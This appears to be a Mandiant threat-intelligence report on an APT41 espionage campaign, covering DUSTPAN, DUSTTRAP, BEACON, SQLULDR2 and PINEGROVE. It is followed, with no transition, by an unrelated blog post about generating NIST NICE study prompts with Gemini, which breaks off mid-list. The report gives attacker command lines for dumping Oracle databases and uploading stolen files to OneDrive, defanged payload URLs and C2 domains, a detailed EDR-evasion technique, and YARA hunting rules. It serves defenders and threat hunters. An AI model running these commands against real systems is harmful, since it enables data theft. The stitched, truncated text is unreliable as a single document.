Mandiant Threat Intelligence

Written by: Mike Stokkel, Pierre Gerlings, Renato Fontana, Luis Rocha, Jared Wilson, Stephen Eckels, Jonathan Lepore

 

Executive Summary

• In collaboration with Google’s Threat Analysis Group (TAG), Mandiant has observed a sustained campaign by the advanced persistent threat group APT41 targeting and successfully compromising multiple organizations operating within the global shipping and logistics, media and entertainment, technology, and automotive sectors. The majority of organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom.
• APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since 2023, enabling them to extract sensitive data over an extended period. 
• APT41 used a combination of ANTSWORD and BLUEBEAM web shells for the execution of DUSTPAN to execute BEACON backdoor for command-and-control communication. Later in the intrusion, APT41 leveraged DUSTTRAP, which would lead to hands-on keyboard activity. APT41 used publicly available tools SQLULDR2 for copying data from databases and PINEGROVE to exfiltrate data to Microsoft OneDrive.

Overview

Recently, Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of ANTSWORD and BLUEBEAM web shells for persistence. These web shells were identified on a Tomcat Apache Manager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download the DUSTPAN dropper to stealthily load BEACON. 

As the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper. Upon execution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic traces. The decrypted payload was designed to establish communication channels with either APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have been successfully remediated to prevent further unauthorized access.

Furthermore, APT41 leveraged SQLULDR2 to export data from Oracle Databases, and used PINEGROVE to systematically and efficiently exfiltrate large volumes of sensitive data from the compromised networks, transferring to OneDrive to enable exfiltration and subsequent analysis.

Figure 1: Attack path diagram of observed APT41 attack

Victimology

In collaboration with Google's TAG, Mandiant notified multiple additional organizations across various sectors that have been compromised by this campaign. The organizations impacted by this campaign originated from a diverse range of countries spanning multiple continents, including:

• Italy
• Spain
• Taiwan
• Thailand
• Turkey
• United Kingdom

An analysis of victim organizations within specific sectors reveals a notable geographic distribution. Nearly all targeted organizations operating in the shipping and logistics sector were located in Europe and the Middle East, with a single exception. In contrast, all affected organizations within the media and entertainment sector were located in Asia.

A significant portion of the victimized organizations within the shipping and logistics sector maintained operations across multiple continents, often as subsidiaries or affiliates of larger multinational corporations operating within the same industry.

Mandiant has detected reconnaissance activity directed towards similar organizations operating within other countries such as Singapore. At the time of the publication, neither Mandiant nor Google TAG have any indicators of these organizations being compromised by APT41, but it could potentially indicate an expanded scope of targeting.

Figure 2: Sectors impacted by APT41’s DUSTTRAP campaigns in 2024

APT41

APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity that may be outside of state control.  The group's financially motivated intrusions have primarily targeted the video game industry, involving activities such as stealing source code and digital certificates, manipulating virtual currencies, and attempting to deploy ransomware. APT41 is unique among tracked China-based actors in that it utilizes non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions.

The group's espionage operations have targeted sectors such as healthcare, high-tech, and telecommunications, and other areas of economic interest. APT41 has frequently used software supply chain compromises, where they inject malicious code into legitimate software updates. They also employ advanced techniques like the use of bootkits and compromised digital certificates. The group's consistent targeting of the video game industry for personal gain is believed to have contributed to the development of tactics later used in their espionage operations. 

For additional information on APT41, refer to the following links:

• Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments
• APT41: A Dual Espionage and Cyber Crime Operation

Threat Activity DUSTPAN and BEACON

DUSTPAN is an in-memory dropper written in C/C++ that decrypts and executes an embedded payload. Different variations of DUSTPAN may also load an external payload off disk from a hard-coded file path encrypted in the Portable Executable (PE) file. DUSTPAN may be configured to inject the decrypted payload into another process or create a new thread and execute it within its own process space. 

Previously used by APT41 in several 2021 and 2022 breaches, DUSTPAN resurfaced in a recent investigation. This time, APT41 disguised DUSTPAN as a Windows binary by executing the malicious file as w3wp.exe or conn.exe. Additionally, the DUSTPAN samples were made persistent via Windows services; for example, one of the services was called Windows Defend.

The DUSTPAN samples were configured to load BEACON payloads into memory that were encrypted using chacha20. The BEACON payloads, once executed, communicated using either self-managed infrastructure hosted behind Cloudflare or utilized Cloudflare Workers as their command-and-control (C2) channels. BEACON configuration can be found in the Indicators of Compromise section.

DUSTTRAP

DUSTTRAP is a multi-stage plugin framework with multiple components. DUSTTRAP begins with a launcher (Stage 1) that AES-128-CFB decrypts an encrypted on-disk PE file <varies>.dll.mui and executes it in memory. Decryption relies on the target machine's HKLM\SOFTWARE\Microsoft\Cryptography\MachineGUID, thereby keying the launcher to the victim system. The decrypted PE from the launcher is a memory-only dropper (Stage 2) that is responsible for decrypting an embedded configuration and two or more embedded plugin dynamic-link libraries (DLLs) from its .lrsrc section. Once executed, these DLLs begin the setup of the modular plugin system. The first observed plugin (Stage 3) is responsible for low-level network setup and encryption. The second observed plugin (Stage 4) is responsible for higher-level network operations and may function as a downloader for additional plugins that, when loaded, may register themselves with prior components in the execution chain for additional functionality. We've observed the second plugin to vary in functionality and more plugin variants likely exist. 

Plugin loading is performed by trojanizing a legitimate system DLL from %windir% with a sufficiently large .text section to hold the contents of each plugin. To trojanize the target DLL, the dropper will generate a new file on disk at %windir%\Microsoft.NET\assembly\GAC_MSIL\System.Data.Trace\
v4.0_4.0.0.0__b0<hex_uuid>\<original_module_name>.dll or %programdata%\Microsoft.NET\System.Data.Trace\v4.0_4.0.0.0__b0<hex_uuid>\<original_module_name>.dll. The malicious plugin code is only present in the .text section of this file long enough to call ZwCreateSection, loading the trojanized malicious plugin code into memory. Before the trojanized file is closed, the original contents of the .text section are restored on disk. This is an evasion technique that will bypass endpoint detection and response (EDR) solutions that scan for malicious contents on file close. The malicious code may therefore not be present in the file depending on when it was quarantined. During the trojanization process, the system time may be written to a log file at <filetime>.log and acquire the mutex ICMzUEkdLNayBdWF, though mutex names will likely vary from host to host.

The following legitimate DLLs are blocklisted from being trojanized:

cfgmgr32.dll combase.dll cryptbase.dll cryptsp.dll dhcpcsvc.dll dhcpcsvc6.dll dnsapi.dll FWPUCLNT.DLL gdi32.dll gdi32full.dll iertutil.dll imm32.dll IPHLPAPI.DLL kernel.appcore.dll kernel32.dll KernelBase.dll locale.nls msvcp_win.dll msvcrt.dll mswsock.dll NapiNSP.dll nlaapi.dll nsi.dll ntdll.dll ntmarta.dll oleaut32.dll OnDemandConnRouteHelper.dll pnrpnsp.dll powrprof.dll advapi32.dll apphelp.dll bcrypt.dll bcryptprimitives.dll profapi.dll rasadhlp.dll rpcrt4.dll rsaenh.dll sechost.dll SHCore.dll shell32.dll shlwapi.dll sspicli.dll ucrtbase.dll urlmon.dll user32.dll userenv.dll webio.dll win32u.dll windows.storage.dll winhttp.dll wininet.dll winnlsres.dll winnsi.dll winrnr.dll winsta.dll ws2_32.dll wshbth.dll Wtsapi32.dll

The section objects created by the Stage 2 dropper for each trojanized plugin are appended to a linked list in the droppers process and executed in memory. The dropper and each plugin perform a registration process with each other so that stages 2, 3, and 4 rely on each other and cooperatively call into and out of each other to handle the operation each is responsible for. Execution between all of these components is accomplished via Windows fiber-based task event loop driven by Stage 2. Additional plugins may be registered and executed via this plugin framework.

We've observed at least 15 plugins with the higher-level themes of:

• Shell Operations
  • Executing processes via cmd.exe
• File System Operations
  • Directory enumeration
  • Changing directory
  • Delete file
  • Create directory
  • Copy file
  • Move file
  • File exists
  • Change file timestamp
  • List attached drives
• Process Operations
  • Enumerate running processes
  • Inject shellcode
  • Kill a process
• Network Probing
  • Ping a remote host
  • Attempt connections on port
• Network Store Interface Operations
  • Get network interface statistics
• Screen Operations
  • Get screen size
  • Screenshot
• System Information Survey
  • List RDP sessions
  • List installed security software
  • Get system info
  • List user accounts
  • Get system boot time
  • Enumerate hidden and visible process windows
• File Manipulation Operations
  • Open file
  • Write file
  • CRC32 file content
  • Read file
  • Close file
• Keylogger
  • Activate 
  • Delete log
• Active Directory Operations
  • Enumerate domain controller information
  • Add user
  • Delete user
  • Get server configuration
  • Get server shares
  • Get detailed server and workstation domain information
  • Enumerate servers
  • Get list of services
  • Get list of network shares
  • Add network share
  • Disconnect network share
  • Get list of users
  • Set user password
• File Uploader
  • Upload file resident on disk
• RDP
  • Enumerate remote desktop sessions
• DNS Operations
  • Perform DNS lookups
• DNS Cache Operations
  • Retrieves DNS cache table operations
• Registry Operations
  • Get registry value
  • Dump registry path and children to disk
  • Set registry value
  • Delete registry value

Figure 3: Full execution flow of DUSTTRAP

SQLULDR2

SQLULDR2 is a command-line utility written in C/C++ that can be used to export the contents of a remote Oracle database to a local text-based file. There are multiple command-line parameters available to specify the details of the data export including but not limited to: query, user, rows, and text.

APT41 exported data from Oracle Databases to CSV formats with the following command:

C:\ProgramData\luldr\luldr\sqluldr.exe user=<USER>@<SYSTEM>:1521/ <DATABASE> charset=utf8 safe=yes head=yes text=csv rows=50000000 batch=yes query=<SQL QUERY> file=<OUTPUT>.csv

Figure 4: Command line execution for SQLULDR2

PINEGROVE

During the intrusion, Mandiant observed APT41 leveraging PINEGROVE for their data exfiltration. PINEGROVE is a command-line uploader written in Go with functionality to collect and upload a file to OneDrive via the OneDrive API. PINEGROVE expects an authentication JSON file including relevant OneDrive credentials and the target file to upload.

C:\Programdata\One.exe -c C:\ProgramData\auth.json -s <Filename>

Figure 5: Command line execution for PINEGROVE

PINEGROVE is a publicly available tool and has been made available on Github.

Code Signing Certificates

The DUSTTRAP malware and its associated components that were observed during the intrusion were code signed with presumably stolen code signing certificates. One of the code signing certificates seemed to be related to a South Korean company operating in the gaming industry sector.

Serial Number: 6f:97:f1:3d:a5:5e:9f:70:a6:92:7e:d1:b3:3e:ee:ee Signature Algorithm: sha256WithRSAEncryption Issuer: C = US, O = "thawte, Inc.", CN = thawte SHA256 Code Signing CA Validity Not Before: Feb 21 00:00:00 2019 GMT Not After : Apr 21 23:59:59 2022 GMT Subject: C = KR, ST = SEOUL, L = Gangnam-gu, O = CCR INC, OU = IT Team, CN = CCR INC

Figure 6: Code signing certificate abused by APT41

Serial Number: 05:fa:8a:72:da:46:07:4f:de:1e:34:c7:46:61:ee:00 Signature Algorithm: sha256WithRSAEncryption Issuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 Assured ID Code Signing CA Validity Not Before: Jul 15 00:00:00 2020 GMT Not After : Aug 31 12:00:00 2022 GMT Subject: C = RU, L = Moscow, O = OOO ALEAN-TOUR, CN = OOO ALEAN-TOUR

Figure 7: Code signing certificate abused by APT41

Additionally, Mandiant observed an additional DUSTTRAP sample on VirusTotal that was code signed with a certificate from another South Korean gaming company. This same certificate was previously observed by Mandiant in 2020 being used by UNC3914, which is suspected to be another Chinese-nexus threat actor. Note that neither Mandiant nor TAG see any direct relation between UNC3914 and APT41 at the time of writing.

Serial Number: 0a:2c:bf:9b:18:fe:1b:20:b9:4e:ca:c4:b0:78:b8:c1 Signature Algorithm: sha256WithRSAEncryption Issuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 Assured ID Code Signing CA Validity Not Before: Nov 12 00:00:00 2020 GMT Not After : Jan 17 23:59:59 2023 GMT Subject: C = KR, ST = Seoul, L = Gangnam-gu, O = Gala Lab Corp., CN = Gala Lab Corp.

Figure 8: Code signing certificate abused by APT41

The use of the code signing certificate, as well as its suspected owners being companies in the gaming sector, aligns with APT41's tactics, techniques, and procedures (TTPs) and past campaigns. More details about this can be found in our APT41 report. 

Acknowledgement

We would like to thank Google’s TAG, our Incident Response consultants and FLARE who enabled this research. Additionally, we want to thank Mnemonic for reaching out to Mandiant to share their observations.

MITRE ATT&CK

TACTIC

ID

Name

Description

Reconnaissance

T15931.002

Search Open Websites/Domains: Search Engines

APT41 was observed using search engines in visiting victim's reachable servers.

Reconnaissance

T1594

Search Victim-Owned Websites

APT41 was observed visiting victim-owned infrastructure that was externally reachable and observed in internet scan data.

Collection

T1560.001

Archive via Utility

APT41 was observed using rar to compress the data they downloaded from internal Oracle Databases.

Command and Control

T1071.001

Web Protocols

APT41 was observed using HTTPS for the communication as C2 for their malware.

Exfiltration

T1567.002

Exfiltration to Cloud Storage

APT41 was observed using OneDrive for the exfiltration of staged data.

Persistence

T1543.003

Create or Modify System Process: Windows Service

APT41 was observed creating a Windows Service to achieve persistency

Persistence

T1574.001

DLL Search Order Hijacking

APT41 abused DLL search order hijacking to execute DUSTTRAP by using benign and malicious code-signed Windows binaries.

Persistence

T1574.002

DLL Side-Loading

APT41 abused DLL sideloading to execute DUSTTRAP by using the AhnLab uninstaller.

Defense Evasion

T1070.004

File Deletion

APT41 deleted files from the system after they were done using them. This was observed after APT41 created database dumps and exfiltrated the files.

Defense Evasion

T1036.005

Match Legitimate Name or Location

APT41 used legitimate Windows names and locations to trojanize binaries

Defense Evasion

T1027.013

Encrypted/Encoded File

APT41 leveraged AES-128-CFB for the encryption of the payloads that should be loaded by DUSTTRAP.

Persistence

T1505.003

Server Software Component: Web Shell

APT41 was observed using web shells to drop and execute DUSTPAN.

Execution

T1569.002

Service Execution

APT41 was observed using Windows services to execute DUSTPAN binaries.

Indicators of Compromise

A GTI Collection is available for all the samples that are publicly available. 

Host-Based Indicators

Filename

MD5

Family

sqluldr.exe

fcff642268898fcf65702a214aefbf9e

SQLULDR2

OneDriveUploader.exe

ac125aea0b703de37980779599438b4a

PINEGROVE

aclui.dll

17d0ada8f5610ff29f2e8eaf0e3bb578

DUSTPAN

dbgeng.dll

9991ce9d2746313f505dbf0487337082

DUSTTRAP

dbgeng.dll

c33247bc3e7e8cb72133e47930e6ddad

DUSTTRAP

hostfxr.dll

cfce85548436fb89a83bf34dc17f325d

DUSTTRAP

dbgeng.dll

e98b9e21928252332edf934f3d18ac21

DUSTTRAP

dbgeng.dll

8222352a61eacca3a1c6517956aa0b55

DUSTTRAP

-

dc725f5e9b1ae062fbec86ee4d816b45

DUSTTRAP

Sbiedll.dll

d72f202c1d684c9a19f075290a60920f

DUSTTRAP

atstrust.dll

393065ef9754e3f39b24b2d1051eab61

DUSTTRAP

-

0e74285f3359393e57f5d49c156aca47

DUSTTRAP

conn.exe

35f650c94faf6a2068e8238dd99edbea

DUSTPAN

PrintWorkflowUserSvc_
a0c15f9d.dll / cbi.dll

3bb44c0dd7f424864d76d4df09538cb6

DUSTPAN

dbgeng.dll

aca5c6daecf463012a09564764584937

DUSTTRAP

-

336a0d6f8cc92bf9740ce17de600463b

DUSTTRAP

-

6bc4a92ff4d2cfc9da91ae6a5d2ad3d5

DUSTTRAP

-

a689e182fe33b9d564dddc35412ea0a7

DUSTTRAP

-

e4a4aafb49b8c86a5ac087ae342c0ee6

DUSTTRAP

-

e584119a4766e6cf49093c666965c8be

DUSTTRAP

-

f1769ad5a9dc44794895275c656ed484

DUSTTRAP

Network-Based Indicators

Value

Family

Comment

ns2[.]akacur[.]tk

BEACON

-

ns1[.]akacur[.]tk

BEACON

-

orange-breeze-66bb[.]tezsfsoikdvd[.]workers[.]dev

BEACON

-

www[.]eloples[.]com

DUSTTRAP

First observed at 2024-02-21Last observed at 2024-07-16

95.164.16[.]231

-

Related to DUSTTRAP FQDN www[.]eloples[.]com

152.89.244[.]185

-

Used to deliver DUSTPAN

First activity observed at 2023-03-21

hxxp://152.89.244[.]185/conn.exe

-

Used to deliver DUSTPAN

First activity observed at 2023-03-21

YARA and YARA-L Rules YARA rule M_Hunting_Certificate_Gala_lab_corp { meta: author = "Mandiant" description = "Rule looks for PEs signed using likely stolen certificate issued for Gala Lab corp" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $org = "Gala Lab Corp." $serial = { 0A 2C BF 9B 18 FE 1B 20 B9 4E CA C4 B0 78 B8 C1 } condition: ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org > 1 and $serial } rule M_Hunting_Certificate_CCR_INC { meta: author = "Mandiant" description = "Rule looks for PEs signed using likely stolen certificate issued for CCR INC" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $org = "CCR INC" $serial = { 6F 97 F1 3D A5 5E 9F 70 A6 92 7E D1 B3 3E EE EE } condition: ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org > 1 and $serial } rule M_Hunting_Certificate_ALEAN_TOUR { meta: author = "Mandiant" description = "Rule looks for PEs signed using likely stolen certificate issued for ALEAN-TOUR" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $org = "OOO ALEAN-TOUR" $serial = { 05 FA 8A 72 DA 46 07 4F DE 1E 34 C7 46 61 EE 00 } condition: ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org > 1 and $serial } rule M_Hunting_Uploader_PINEGROVE_1 { meta: author = "Mandiant" description = "Hunting for PINEGROVE uploader malware family." disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $s1 = "Config: `%v`" ascii $s2 = "auth.json" ascii $s3 = "sp=%v%v%x" ascii $s4 = "Time: %v" ascii $s5 = "/me/drive/root" ascii $s6 = "OneDrive" ascii fullword $s7 = "microsoft.graph.driveItemUploadableProperties" ascii $s8 = "client_id=%v&client_secret=%v" ascii $s9 = "http://localhost/onedrive-login" ascii condition: ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint32(0) == 0x464c457f) or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) ) and (6 of them) } rule M_Hunting_Uploader_PINEGROVE_2 { meta: author = "Mandiant" description = "Hunting for PINEGROVE uploader malware family." disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $f1 = "main.AllFiles" ascii $f2 = "main.Collect" ascii $f3 = "main.ConfigInit" ascii $f4 = "main.ConfigRead" ascii $f5 = "main.ConfigSave" ascii $f6 = "main.ConfigUpdate" ascii $f7 = "main.Exit" ascii $f8 = "main.FileRange" ascii $f9 = "main.FileReader" ascii $f10 = "main.FileStatus" ascii $f11 = "main.FormatRemoteFilePath" ascii $f12 = "main.GetFileName" ascii $f13 = "main.GetReomtePath" ascii $f14 = "main.Header" ascii $f15 = "main.init.0" ascii $f16 = "main.InitFile" ascii $f17 = "main.IsFolder" ascii $f18 = "main.main" ascii $f19 = "main.PreLoad" ascii $f20 = "main.Range2Int" ascii $f21 = "main.RemainTime" ascii $f22 = "main.SessionCreate" ascii $f23 = "main.ShowBar" ascii $f24 = "main.StringChecker" ascii $f25 = "main.Task" ascii $f26 = "main.TaskFail" ascii $f27 = "main.ThreadUpload" ascii $f28 = "main.Timer" ascii $f29 = "main.TimeUnix" ascii $f30 = "main.Upload" ascii $f31 = "main.Upload.func1" ascii $f32 = "main.Uploading" ascii $version = "go1.13.1" condition: ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint32(0) == 0x464c457f) or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) ) and $version and (25 of ($f*)) } rule M_Hunting_Uploader_PINEGROVE_3 { meta: author = "Mandiant" description = "Hunting for PINEGROVE uploader malware family." disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $s1 = "RefreshToken" $s2 = "RefreshInterval" $s3 = "ThreadNum" $s4 = "BlockSize" $s5 = "SigleFile" $s6 = "MainLand" $s7 = "MSAccount" $anchor1 = "driveItemUploadableProperties" $anchor2 = "client_id" $anchor3 = "client_secret" $anchor4 = "onedrive-login" $anchor5 = "authorization_code" condition: ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint32(0) == 0x464c457f) or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) ) and (5 of ($s*)) and (4 of ($anchor*)) } import "elf" rule M_Hunting_Utility_Linux_SQLULDR2_1 { meta: author = "Mandiant" description = "Detection of the Linux version of SQLULDR2." disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $name = "sqluldr2zip.c" ascii $out = "uldrdata.%p.txt" ascii $heading = "SQL*UnLoader: Fast Oracle Text Unloader" ascii $p1 = "exec = the command to execute the SQLs" ascii $p2 = "file = output file name(default: uldrdata.txt)" ascii $p3 = "format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs" ascii $p4 = "text = output type (MYSQL, CSV, MYSQLINS, ORACLEINS, FORM, SEARCH)" ascii $p5 = "rows = print progress for every given rows (default, 1000000)" ascii $p6 = "query = select statement" ascii $p7 = "user = username/password@tnsname" ascii condition: (uint32(0) == 0x464c457f) and $name and $out and $heading and (5 of ($p*)) and for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == "OCIServerAttach") and for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == "OCISessionBegin") } import "pe" import "elf" rule M_Hunting_Utility_SQLULDR2_1 { meta: author = "Mandiant" description = "Detection of SQLULDR2." disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $win_name = "sqluldr2.exe" ascii $elf_name = "sqluldr2zip.c" ascii $out = "uldrdata.%p.txt" ascii $heading = "SQL*UnLoader: Fast Oracle Text Unloader" ascii $p1 = "exec = the command to execute the SQLs" ascii $p2 = "file = output file name(default: uldrdata.txt)" ascii $p3 = "format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs" ascii $p4 = "text = output type (MYSQL, CSV, MYSQLINS, ORACLEINS, FORM, SEARCH)" ascii $p5 = "rows = print progress for every given rows (default, 1000000)" ascii $p6 = "query = select statement" ascii $p7 = "user = username/password@tnsname" ascii $import = "OCI.dll" ascii condition: (((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and pe.imports("OCI.dll","OCIServerAttach") and pe.imports("OCI.dll","OCISessionBegin") and $import and $win_name and for all of ($p*) : ( @ > @heading )) or ((uint32(0) == 0x464c457f) and $elf_name and for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == "OCIServerAttach") and for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == "OCISessionBegin"))) and $out and $heading and (5 of ($p*)) } rule M_Hunting_Dropper_DUSTTRAP_1 { meta: author = "Mandiant" description = "Detects the DUSTTRAP dropper (x64) based on the use of CFG patching constants and argument construction for payload entry-point" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $cfg_patch_constant_1 = { 48 FF E0 CC 90 } $cfg_patch_constant_2 = { 8B DA 48 8B F9 E8 } $cfg_patch_constant_3 = { B8 48 8B 00 00 66 39 02 } $cfg_patch_constant_4 = { 81 7A 07 48 8B D1 48 } $log_format = "%lld.log" wide condition: uint16(0) == 0x5a4d and all of ($cfg_patch_constant_*) and $log_format } import "pe" rule M_Hunting_DUSTPAN_CryptKeys { meta: author = "Mandiant" description = "Attempts to detect executables containing known DUSTPAN encryption keys within the .data section" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $key_1 = {3BCF741BF6411C087415BA340000004C8D05F28 C0000488B4910E801F0FEFFB8} $key_2 = {C4498BD6488BCFE848A5000084C07564488BCFE 8585C0000498B0F4C8B497045} $key_3 = {A24299055F1F0C14CBDD0B01DFA64C34F5FD033 CA7F1AF30A0C75C57359D41E0} condition: filesize < 15MB and for any i in (0..pe.number_of_sections - 1): ( pe.sections[i].name == ".data" and any of ($key_*) in (pe.sections[i].raw_data_offset.. pe.sections[i].raw_data_offset + pe.sections[i].raw_data_size) ) } import "pe" rule M_HUNTING_DUSTTRAP_PayloadFile { meta: author = "Mandiant" description = "Detects executables containing a .lrsrc section which may represent DUSTTRAP payloads" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." condition: for any i in (0..pe.number_of_sections - 1): ( uint32(pe.sections[i].raw_data_offset + 0) == 0x100 and pe.sections[i].raw_data_size > uint32 (pe.sections[i].raw_data_offset + 0) and pe.sections[i].name == ".lrsrc" and uint32(pe.sections[i].raw_data_offset + 4) < 0x1000 and uint32(pe.sections[i].raw_data_offset + 8) < 4 ) } YARA-L

If you are a Google SecOps Enterprise+ customer, rules were released to your Emerging Threats rule pack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence.  

Relevant Rules

• WinRAR Command Line CSV to RAR
• SQLULDR2 Process Launch
• DUSTTRAP Process Execution and Command and Control
• DUSTTRAP Dropping Multiple Utilities
• DUSTTRAP Spawning Actions on Objectives Processes
• Suspected DUSTTRAP Command and Control via Google API
• Suspected Stolen Code Signing Certificate (CCR Inc)

Written by: Jake Liefer

 

In the ever-evolving landscape of cybersecurity, staying ahead of threats demands continuous learning and skill development. The NIST NICE framework provides a roadmap, but mastering its extensive tasks, knowledge, and skills (TKSs) can be daunting. That's where the power of artificial intelligence (AI) comes in.

We've leveraged Google Gemini AI to create a revolutionary solution: a comprehensive library of over 6,000 prompts designed to guide you through the NICE framework. These AI-powered prompts offer a dynamic and personalized learning experience, accelerating your journey to cybersecurity expertise.

In this blog post, we'll explore the NIST NICE framework in detail, delve into the art of prompt engineering, and share how we harnessed the power of Google Gemini AI to build this valuable resource. Whether you're a seasoned cybersecurity veteran or just starting your journey, this guide will provide you with the tools and insights you need to engage with large language models (LLMs) for a dynamic learning experience.

The NIST NICE Framework: Your Blueprint for Cybersecurity Success

The National Initiative for Cybersecurity Education (NICE) framework, developed by the National Institute of Standards and Technology (NIST), serves as the cornerstone of cybersecurity education and workforce development. 

At its core, the NICE framework provides a common language and taxonomy for describing cybersecurity work. Each role is mapped to specific TKSs necessary for successful responsibilities. By mapping out these competencies, the NICE framework helps individuals identify career paths, employers define job requirements, and training providers develop targeted curricula.

But the NICE framework isn't just about job descriptions and training programs. It's about building a robust and adaptable cybersecurity workforce capable of meeting the dynamic challenges of the digital age. By aligning your skillset with the NICE framework, you're not only investing in your own career advancement but also contributing to the collective defense against cyber threats.

Whether you're aspiring to become a security analyst, penetration tester, incident responder, or any other cybersecurity role, understanding and embracing the NICE framework is essential. It provides a roadmap for your professional development, highlighting the knowledge and skills you need to acquire to succeed in your chosen path. In the following sections, we'll explore how AI-powered prompts can help you navigate this roadmap and accelerate your mastery of the essential competencies outlined in the NICE framework.

Prompt Engineering: Unleashing the Power of LLMs for Cybersecurity Learning

In the realm of artificial intelligence, LLMs like Google Gemini have emerged as powerful tools capable of understanding and generating human-like text. At the heart of harnessing this power lies the art of prompt engineering. But what exactly is a prompt, and why is it so crucial for cybersecurity learning?

In simple terms, a prompt is the input you provide to an LLM to guide its response. Think of it as a question, a scenario, or a task that you present to the AI. The quality and specificity of your prompt directly influence the quality and relevance of the LLM's output.

In the context of cybersecurity, well-crafted prompts are the key to unlocking the full potential of LLMs for learning and skill development, especially when aligned with the NIST NICE framework. They can:

• Pinpoint Knowledge Gaps and Focus Areas: By reviewing the TKSs for your current role and desired role, you can identify areas where you need to upskill. Prompts can then be tailored to focus on those specific areas, ensuring efficient and targeted learning.
• Develop Specific Skills and Knowledge: Prompts can be designed to address specific TKSs within the NICE framework, such as "risk analysis" or "incident response." This targeted approach allows for deep dives into the exact skills you need to develop.
• Create Realistic Job Scenarios: Prompts can simulate the day-to-day tasks and challenges you'll face in your target role, providing a practical understanding of how the TKSs are applied in real-world situations. This can help you prepare for new responsibilities and advance your career.
• Facilitate Personalized Learning Plans: Based on your individual needs and career goals, LLMs can generate personalized learning paths that focus on the most relevant TKSs. This ensures that you're not wasting time on irrelevant information and can progress efficiently towards your goals.

There are several types of prompts you can use to enhance your cybersecurity learning:

• Conceptual prompts: These prompts challenge your understanding of fundamental cybersecurity concepts, such as encryption, authentication, or risk management, and how they relate to specific NICE TKSs.
• Scenario-based prompts: These prompts put you in the shoes of a cybersecurity professional facing a real-world challenge aligned with a particular TKS, such as responding to a data breach or investigating suspicious network activity.
• Knowledge-check prompts: These prompts test your knowledge of specific TKSs within the NICE framework, helping you gauge your progress and identify areas for further study.

By incorporating diverse prompts aligned with the NICE framework into your learning routine, you can create a focused and efficient learning experience that directly translates to career advancement. In the next section, we'll explore how we used Google Gemini AI to create a comprehensive library of prompts specifically designed to help you master the NICE framework.

Building Your Cybersecurity Arsenal with Google Gemini AI

Google Gemini, a state-of-the-art large language model, isn't just a tool for generating text; it's a powerful ally in your journey to cybersecurity mastery. With its advanced capabilities in natural language understanding and generation, Gemini is uniquely suited for crafting prompts that align perfectly with the NIST NICE framework and accelerate your skill development.

Our Methodology:

Creating a comprehensive library of over 6,000 prompts was made efficient and effective by leveraging the structured nature of the NICE framework and the power of Google Gemini within the AI Studio environment. Here's a detailed breakdown of our streamlined process:

1. TKS Identification and Extraction: We began by extracting the unique Task, Knowledge, Skill (TKS) statement IDs and their corresponding descriptions directly from the NICE framework. These served as the foundational building blocks for our prompt generation process.
2. Prompt Generation with Gemini in AI Studio: Within AI Studio, we harnessed Google Gemini's language generation prowess to create a wide variety of prompts based on the extracted TKS IDs and descriptions. Specifically, we crafted three distinct types of prompts for each TKS:
   
   • Conceptual prompts: These are designed to challenge your understanding of the core concepts embedded within the TKS.
   • Scenario-based prompts: These immerse you in realistic situations where the TKS is applied, bridging theory and practice.
   • Knowledge-check prompts: These test your grasp of the specific knowledge outlined in the TKS.

   By utilizing the TKS ID and description as direct input, we ensured that each generated prompt was
   precisely aligned with the corresponding competency within the NICE framework.

